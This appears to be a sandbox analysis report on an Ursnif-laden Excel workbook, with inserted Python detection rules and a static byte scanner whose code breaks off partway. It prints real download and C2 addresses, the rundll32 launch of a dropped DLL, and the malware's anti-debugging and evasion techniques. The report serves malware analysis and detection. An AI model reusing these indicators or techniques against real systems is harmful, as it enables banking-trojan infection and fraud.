Analysis Report Attached_File_898318.xlsb

Overview

General Information

Sample Name: Attached_File_898318.xlsb
Analysis ID: 350713
MD5: a8532cadcdc6aa2ca92e78352727bd50
SHA1: de9a89b9a1ac2778660695a982b9f34641fd3608
SHA256: 8c54fb4a33fef841a472e5c7d92b49c1d589a8af374e510331f72fb5a4189c4a

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found API chain indicative of debugger detection
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7052 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4536 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6764 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "300", "system": "7d20f8f4847cb6a63944d316a102ff61", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1612925042", "user": "3d11f4f58695dc15e71ab15cd7543d9b", "hash": "0xcf6ed071", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
Process Memory Space: rundll32.exe PID: 4536 | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

      Sigma Overview

      System Summary:

      Sigma detected: Microsoft Office Product Spawning Windows Shell
      Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data:
        Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
        CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
        CommandLine|base64offset|contains:
        Image: C:\Windows\SysWOW64\rundll32.exe
        NewProcessName: C:\Windows\SysWOW64\rundll32.exe
        OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
        ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
        ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
        ParentProcessId: 7052
        ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
        ProcessId: 4536

      Signature Overview

      AV Detection:

      Found malware configuration
      Source: rundll32.exe.4536.2.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "300", "system": "7d20f8f4847cb6a63944d316a102ff61", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1612925042", "user": "3d11f4f58695dc15e71ab15cd7543d9b", "hash": "0xcf6ed071", "soft": "3"}
      Multi AV Scanner detection for domain / URL
      Source: api10.laptok.at | Virustotal: Detection: 10%

      Compliance:

      Uses new MSVCR Dlls
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
      Uses secure TLS version for HTTPS connections
      Source: unknown | HTTPS traffic detected: 192.185.16.102:443 -> 192.168.2.6:49728 version: TLS 1.2
      Binary contains paths to debug symbols
      Source: Binary string: c:\OldMust\LevelChange\againstlaw\each.pdb source: 2200[1].dll.0.dr
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A17DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00A17DD8

      Software Vulnerabilities:

      Document exploit detected (creates forbidden files)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\ddg\11.dll
      Document exploit detected (drops PE files)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: 2200[1].dll.0.dr
      Document exploit detected (UrlDownloadToFile)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe
      Source: Joe Sandbox View | ASN Name: GOOGLEUS GOOGLEUS
      Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknown | TCP traffic detected without corresponding DNS query: 139.162.190.91 (12 identical entries)
      Source: global traffic | HTTP traffic detected:
        GET /campo/a/a HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: 139.162.190.91
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j HTTP/1.1
        Accept: text/html, application/xhtml+xml, image/jxr, */*
        Accept-Language: en-US
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Accept-Encoding: gzip, deflate
        Host: api10.laptok.at
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected (logged twice):
        GET /favicon.ico HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: api10.laptok.at
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /api1/7tidwRkCPNkyKHRu/sM7SqYc7lDPAe2Y/LxU4hPUrQ8DyLrlP8w/Nv_2FoafN/Gi3x5QhAhJwP6RZeuOE3/JqQwpPFp6P_2Bgw1Ow4/YQbUpkvF6g4Fdj4IZHGtNs/drxOxsX9ra8ze/alAzZjOu/wfTEPlwQzX9RKEQJf5J8q2h/QY5MtTc_2B/fN9jwgMPnCxXHk4JM/h48AsZ0sO93u/BNd8Zp5c15S/_2FwZ_2FDNtvXf/0udmkslKsSD_2BqfUIpZ3/CB9K3mpzjq1wwzDp/YFrr1SvQi2fLHme/2BwbHda90Wbf3bIygC/3yPHqi_2B/qHeLcZQp_2BFoaOMMJJ4/L9wxE1UCA/P HTTP/1.1
        Accept: text/html, application/xhtml+xml, image/jxr, */*
        Accept-Language: en-US
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Accept-Encoding: gzip, deflate
        Host: api10.laptok.at
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k HTTP/1.1
        Accept: text/html, application/xhtml+xml, image/jxr, */*
        Accept-Language: en-US
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Accept-Encoding: gzip, deflate
        Host: api10.laptok.at
        Connection: Keep-Alive
      Source: unknown | DNS traffic detected: queries for: urbandancecity.com
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 09 Feb 2021 17:44:00 GMT
        Content-Type: text/html; charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        Content-Encoding: gzip
        (chunked, gzip-compressed response body omitted)
      Source: sheet9.bin | String found in binary or memory: http://139.162.190.91/campo/a/a.D
      Source: 2200[1].dll.0.dr | String found in binary or memory: http://majorleave.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownHTTPS traffic detected: 192.185.16.102:443 -> 192.168.2.6:49728 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      Yara detected Ursnif
      Source: Yara match | File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      E-Banking Fraud:

      Yara detected Ursnif
      Source: Yara match | File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      System Summary:

      Office process drops PE file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\ddg\11.dll
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll
      Writes registry values via WMI
      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC41AD1 NtMapViewOfSection
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC41C22 GetProcAddress,NtCreateSection,memset
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC423C5 NtQueryVirtualMemory
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A17925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A1B169 NtQueryVirtualMemory
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC421A4
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A140B3
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A1AF44
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC68FAA
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC6AF74
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC65A1A
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC72D21
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC70C89
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC724BC
      Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSB@6/10@4/3
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A1229C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{8D47CC7A-5DAB-4020-89AB-89D27B6C21E5} - OProcSessId.dat
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
      Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
      Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
      Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
      Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
      Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: Attached_File_898318.xlsb | Initial sample: OLE zip file path = docProps/thumbnail.wmf
      Source: Attached_File_898318.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
      Source: Attached_File_898318.xlsb | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: Binary string: c:\OldMust\LevelChange\againstlaw\each.pdb | source: 2200[1].dll.0.dr
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC42140 push ecx; ret 2_2_6FC42149
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC42193 push ecx; ret 2_2_6FC421A3
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A1E6BE push esp; retf 2_2_00A1E6BF
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A1AC00 push ecx; ret 2_2_00A1AC09
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A1E1AF push ebx; ret 2_2_00A1E1B2
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A1AF33 push ecx; ret 2_2_00A1AF43
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A1E163 push edx; iretd 2_2_00A1E164
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC50B9B push ecx; iretd 2_2_6FC50BD9
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC54B10 push ebx; retf 2_2_6FC54B4B
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC54B38 push ebx; retf 2_2_6FC54B4B
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC692D5 push ecx; ret 2_2_6FC692E8
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC54E84 push 8D039560h; retf 2_2_6FC54EBE
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC56A7E push ebx; ret 2_2_6FC56A9A
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC56A03 push eax; ret 2_2_6FC56A06
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC56197 push esp; iretd 2_2_6FC5619E
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC569A7 push edi; ret 2_2_6FC569B4
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\ddg\11.dll
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\ddg\11.dll
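The process chain and WMI registry writes listed above (EXCEL.EXE starting rundll32.exe on C:\ProgramData\ddg\11.dll via DllRegisterServer, then StdRegProv::Set*Value calls issued by that rundll32) are the events a detection engineer would key on. The Python below is an added example for this page, not Joe Sandbox code and not anything recovered from the sample: it runs two rules over a constructed event list that mirrors the report's process tree and correlates them by PID. The Event fields, the placeholder PIDs 1000 and 1001, and the benign negative cases are assumptions; PIDs 4536 and 6688 and all paths and command lines are taken from the report.

```python
"""Detection rules for the execution chain in this report: an Office process
starting rundll32.exe on a DLL dropped under C:\\ProgramData via
DllRegisterServer, then registry writes from that rundll32 through WMI's
StdRegProv. Added example for this page; the event schema is an assumption,
not any sensor's real format."""
import ntpath
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Directories writable without elevation, where a document payload can drop files.
USER_WRITABLE = re.compile(
    r"^(?:c:\\programdata\\|c:\\users\\[^\\]+\\(?:appdata|downloads)\\|c:\\users\\public\\)",
    re.I)
# "<path>.dll,DllRegisterServer" with optional quotes around the path.
DLLREG = re.compile(
    r"""["']?(?P<dll>[A-Za-z]:\\[^,"']+\.dll)["']?\s*,\s*DllRegisterServer\b""", re.I)


@dataclass
class Event:
    kind: str                 # "process_create" | "wmi_method"
    pid: int
    image: str
    parent_image: str = ""    # "" = unknown, as the report shows for root processes
    command_line: str = ""
    wmi_class: str = ""
    wmi_method: str = ""


def _base(path):
    return ntpath.basename(path).lower()


def rule_office_to_rundll32(ev):
    """Office parent -> rundll32.exe <dll>,DllRegisterServer."""
    if ev.kind != "process_create" or _base(ev.image) != "rundll32.exe":
        return None
    if _base(ev.parent_image) not in OFFICE_IMAGES:
        return None
    m = DLLREG.search(ev.command_line)
    if not m:
        return None
    dll = m.group("dll")
    return {"rule": "office_spawns_rundll32_dllregisterserver", "pid": ev.pid, "dll": dll,
            "severity": "high" if USER_WRITABLE.match(dll) else "medium"}


def rule_rundll32_wmi_regwrite(ev):
    """rundll32.exe writing the registry through StdRegProv Set*Value methods."""
    if ev.kind != "wmi_method" or _base(ev.image) != "rundll32.exe":
        return None
    if ev.wmi_class.lower() != "stdregprov" or not ev.wmi_method.lower().startswith("set"):
        return None
    return {"rule": "rundll32_wmi_registry_write", "pid": ev.pid,
            "method": ev.wmi_method, "severity": "medium"}


def triage(events):
    """Apply both rules in event order; a WMI write from a PID the first rule
    already flagged is escalated, which is the chain this report shows."""
    findings, flagged = [], set()
    for ev in events:
        hit = rule_office_to_rundll32(ev)
        if hit:
            flagged.add(ev.pid)
            findings.append(hit)
        hit = rule_rundll32_wmi_regwrite(ev)
        if hit:
            if ev.pid in flagged:
                hit["severity"] = "high"
                hit["chained_to"] = "office_spawns_rundll32_dllregisterserver"
            findings.append(hit)
    return findings


EXCEL = r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"
RUNDLL = r"C:\Windows\SysWOW64\rundll32.exe"   # WOW64 redirection of System32\rundll32.exe
IE64 = r"C:\Program Files\Internet Explorer\iexplore.exe"
IE32 = r"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

# Constructed events mirroring the report's process tree. PIDs 4536 and 6688
# come from the report; 1000 and 1001 are invented placeholders.
SAMPLE_EVENTS = [
    Event("process_create", 1000, EXCEL, command_line=f'"{EXCEL}" /automation -Embedding'),
    Event("process_create", 4536, RUNDLL, parent_image=EXCEL,
          command_line=r'"C:\Windows\System32\rundll32.exe" C:\ProgramData\ddg\11.dll,DllRegisterServer'),
    Event("wmi_method", 4536, RUNDLL, wmi_class="StdRegProv", wmi_method="SetDWORDValue"),
    Event("wmi_method", 4536, RUNDLL, wmi_class="StdRegProv", wmi_method="SetBinaryValue"),
    Event("wmi_method", 4536, RUNDLL, wmi_class="StdRegProv", wmi_method="SetStringValue"),
    # Negatives: IE's own child process and a WMI *read* must not fire.
    Event("process_create", 1001, IE32, parent_image=IE64,
          command_line=f'"{IE32}" SCODEF:6688 CREDAT:17410 /prefetch:2'),
    Event("wmi_method", 4536, RUNDLL, wmi_class="StdRegProv", wmi_method="GetStringValue"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Quoting of command lines differs between sensors (the sandbox renders paths with single quotes, Sysmon keeps whatever the caller passed), so DLLREG accepts an optional quote on either side of the DLL path. An Office parent is the strongest signal on its own; the DLL living under C:\ProgramData raises the finding to high because calling DllRegisterServer on a DLL in a user-writable directory is rarely legitimate in an Office workflow, and the rule would stay at medium for a DLL under System32.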

      Hooking and other Techniques for Hiding and Protection:

      Yara detected Ursnif
      Source: Yara match | File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (30 identical entries)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll
      Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess | graph_2-13193
      Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_2-11935
      Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A17DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
      Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node | graph_2-13195

      Anti Debugging:

      Found API chain indicative of debugger detection
      Source: C:\Windows\SysWOW64\rundll32.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep | graph_2-12784
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC6DF2F _memset,IsDebuggerPresent
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC6E881 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC88303 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC87E40 push dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC88239 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC6950C GetProcessHeap
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC6DC66 SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A18B98 cpuid
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC41B13 GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA
      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC41000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_00A18B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_6FC4166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
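The anti-debugging entries above (IsDebuggerPresent plus three reads through fs:[30h], which on 32-bit Windows is the TEB field holding the PEB pointer) and the push/ret, push/retf and push/iretd sequences listed under System Summary are byte-level idioms that can be triaged statically before a sample is run. The scanner below is an added example for this page, not Joe Sandbox code: it linearly scans a byte buffer for the x86 encodings of those idioms. The buffer SAMPLE is constructed to reproduce the instruction sequences the report names (the report's own addresses are not reproduced; offsets here are arbitrary), and the `mov al, [eax+2]` after the PEB read is my illustration of the BeingDebugged check that commonly follows it.

```python
"""Static triage for two idioms this report attributes to the rundll32-hosted
code: reads of the PEB through the FS segment (fs:[30h]) and
push <reg|imm>; ret/retf/iretd control-flow tricks. Added example for this
page, not Joe Sandbox code and not code recovered from the sample."""

REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET_OPCODES = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCF: "iretd"}
PEB_DISP = b"\x30\x00\x00\x00"          # fs:[30h] = TEB.ProcessEnvironmentBlock on x86


def scan(buf: bytes):
    """Return [(offset, description)] for each idiom found by a linear byte scan."""
    hits = []
    n = len(buf)
    i = 0
    while i < n:
        b = buf[i]
        if b == 0x64:                                    # FS segment-override prefix
            if buf[i + 1:i + 6] == b"\xA1" + PEB_DISP:   # mov eax, fs:[30h] (moffs32 form)
                hits.append((i, "mov eax, fs:[30h] (PEB)"))
                i += 6
                continue
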